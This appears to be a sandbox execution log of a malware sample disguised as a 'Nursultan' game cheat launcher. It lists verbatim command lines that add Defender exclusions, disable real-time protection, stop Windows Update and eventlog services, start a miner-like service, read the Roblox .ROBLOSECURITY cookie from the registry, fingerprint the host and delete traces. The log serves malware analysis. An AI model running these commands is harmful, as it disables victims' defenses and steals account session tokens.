"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

